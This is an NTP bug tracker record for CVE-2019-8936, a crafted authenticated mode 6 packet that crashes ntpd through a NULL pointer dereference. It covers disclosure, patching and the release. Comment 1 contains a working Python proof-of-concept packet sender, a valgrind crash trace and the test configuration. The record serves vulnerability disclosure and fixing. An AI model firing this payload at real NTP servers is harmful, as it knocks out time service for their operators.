NTP users are strongly urged to take immediate action to ensure that their NTP daemons are not susceptible to being used in distributed denial-of-service (DDoS) attacks. Please also take this opportunity to defeat denial-of-service attacks by implementing Ingress and Egress filtering through BCP38.

ntp-4.2.8p18 was released on 25 May 2024 and addresses 40 bugs and provides 40 improvements.

Please see the NTP 4.2.8p18 Changelog for details.

Bug 3565 - Crafted null dereference attack in authenticated mode 6 packet
Summary: Crafted null dereference attack in authenticated mode 6 packet
Status: RESOLVED FIXED
Alias: None
Product: ntp
Classification: Unclassified
Component: ntpd (show other bugs)
Version: 4.2.8
Hardware: PC All
: P2 major
Assignee: Juergen Perlinger
URL:
: 3568 (view as bug list)
Depends on:
Blocks:
 
Reported: 2019-01-15 23:37 UTC by Harlan Stenn
Modified: 2019-03-07 12:40 UTC (History)
2 users (show)

See Also:
stenn: blocking4.2.8+


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Harlan Stenn 2019-01-15 23:37:36 UTC

    
Comment 1 Harlan Stenn 2019-01-15 23:49:51 UTC
An authenticated attacker can cause ntpd to sigsegv by triggering a NULL pointer exception.

Embargo offered until 15 April 2019.

Proof of concept:

#!/usr/bin/env python
import sys
import socket

buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
       "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
       "\x56\xc8\x07\xd4")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))

Crash report:

$ sudo valgrind ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
==21159== Memcheck, a memory error detector
==21159== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==21159== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==21159== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
==21159== 
15 Jan 21:17:45 ntpd[21159]: ntpd 4.2.8p12@1.3728-o Tue Jan 15 12:39:50 UTC 2019 (1): Starting
15 Jan 21:17:45 ntpd[21159]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
15 Jan 21:17:45 ntpd[21159]: proto: precision = 1.338 usec (-19)
15 Jan 21:17:45 ntpd[21159]: switching logging to file /tmp/ntp.log
15 Jan 21:17:46 ntpd[21159]: Listen and drop on 0 v6wildcard [::]:123
15 Jan 21:17:46 ntpd[21159]: Listen and drop on 1 v4wildcard 0.0.0.0:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 2 lo 127.0.0.1:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 3 eth0 192.168.245.230:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 4 lo [::1]:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123
15 Jan 21:17:46 ntpd[21159]: Listening on routing socket on fd #22 for interface updates
15 Jan 21:17:46 ntpd[21159]: kernel reports TIME_ERROR: 0x41: Clock Unsynchronized
15 Jan 21:17:46 ntpd[21159]: kernel reports TIME_ERROR: 0x41: Clock Unsynchronized
==21159== Invalid read of size 1
==21159==    at 0x133E60: write_variables (ntp_control.c:3467)
==21159==    by 0x147539: receive (ntp_proto.c:690)
==21159==    by 0x12C8CD: ntpdmain (ntpd.c:1442)
==21159==    by 0x5FE4B44: (below main) (libc-start.c:287)
==21159==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==21159== 
==21159== 
==21159== Process terminating with default action of signal 11 (SIGSEGV)
==21159==  Access not within mapped region at address 0x0
==21159==    at 0x133E60: write_variables (ntp_control.c:3467)
==21159==    by 0x147539: receive (ntp_proto.c:690)
==21159==    by 0x12C8CD: ntpdmain (ntpd.c:1442)
==21159==    by 0x5FE4B44: (below main) (libc-start.c:287)
==21159==  If you believe this happened as a result of a stack
==21159==  overflow in your program's main thread (unlikely but
==21159==  possible), you can try to increase the size of the
==21159==  main thread stack using the --main-stacksize= flag.
==21159==  The main thread stack size used in this run was 204800.
==21159== 
==21159== HEAP SUMMARY:
==21159==     in use at exit: 120,503 bytes in 2,646 blocks
==21159==   total heap usage: 2,785 allocs, 139 frees, 397,278 bytes allocated
==21159== 
==21159== LEAK SUMMARY:
==21159==    definitely lost: 0 bytes in 0 blocks
==21159==    indirectly lost: 0 bytes in 0 blocks
==21159==      possibly lost: 3,134 bytes in 4 blocks
==21159==    still reachable: 117,369 bytes in 2,642 blocks
==21159==         suppressed: 0 bytes in 0 blocks
==21159== Rerun with --leak-check=full to see details of leaked memory
==21159== 
==21159== For counts of detected and suppressed errors, rerun with: -v
==21159== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)

Configuration:

$ cat ~/resources/ntp.conf 
logfile /tmp/ntp.log
restrict 127.0.0.1
keys /home/magnus/resources/keys
trustedkey 1
controlkey 1
requestkey 1

$ cat /home/magnus/resources/keys 
1 M gurka
2 M agurk
Comment 2 Magnus Stubman 2019-01-16 09:22:07 UTC
I'd like to note that I discovered this issue while researching vulnerabilities in ntpsec, not ntp.
The issue was therefore reported to the ntpsec team in october last year, and an update was released on the 13th of january. As such the issue as it was found in ntpsec has already been made public.

Fore more, visit https://dumpco.re/bugs/ntpsec-authed-npe
Comment 3 Magnus Stubman 2019-01-16 19:40:29 UTC
The bug report I sent to ntpsec can be found here: https://gitlab.com/NTPsec/ntpsec/issues/509
Comment 4 Juergen Perlinger 2019-01-16 20:52:16 UTC
@Magnus: With all the hints you gave, that was easy enough to reproduce and hunt down. Thanks, a three thumbs up.

@Harlan: The repo is in
   psp.ntp.org:~perlinger/ntp-stable-3565

!NOTE! This is based on your pre-p13 staging repo! (I wanted to make sure the bug is still alive in the current source tree...)

After the changes, the daemon survives the POC attack, so I think it fixes the trouble we have here. If you want me to upload a patch, too, please tell me.
Comment 5 Harlan Stenn 2019-01-16 21:26:18 UTC
Thanks,, Pearly!

We now need a better title for this bug.  Ideas for something better than:

 Possible null pointer dereference on authenticated mode 6 packets

we also need to decide what else will go in to p13.

We'll then need to get everything documented and packaged, and then we can schedule the release to advance-notification partners.
Comment 6 Juergen Perlinger 2019-01-24 22:36:36 UTC
*** Bug 3568 has been marked as a duplicate of this bug. ***
Comment 7 Harlan Stenn 2019-02-19 05:02:51 UTC
STAGED for ntp-4.2.8p13
Comment 8 Magnus Stubman 2019-03-03 11:44:00 UTC
Has this issue been assigned a CVE identifier?
Comment 9 Harlan Stenn 2019-03-07 12:40:22 UTC
Magnus, thanks for your report and patch.  Please check ntp-4.2.8p13 and mark this bug as VERIFIED or REOPENED, as appropriate.

This bug has been assigned http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8936

Pearly, thanks for your work on this.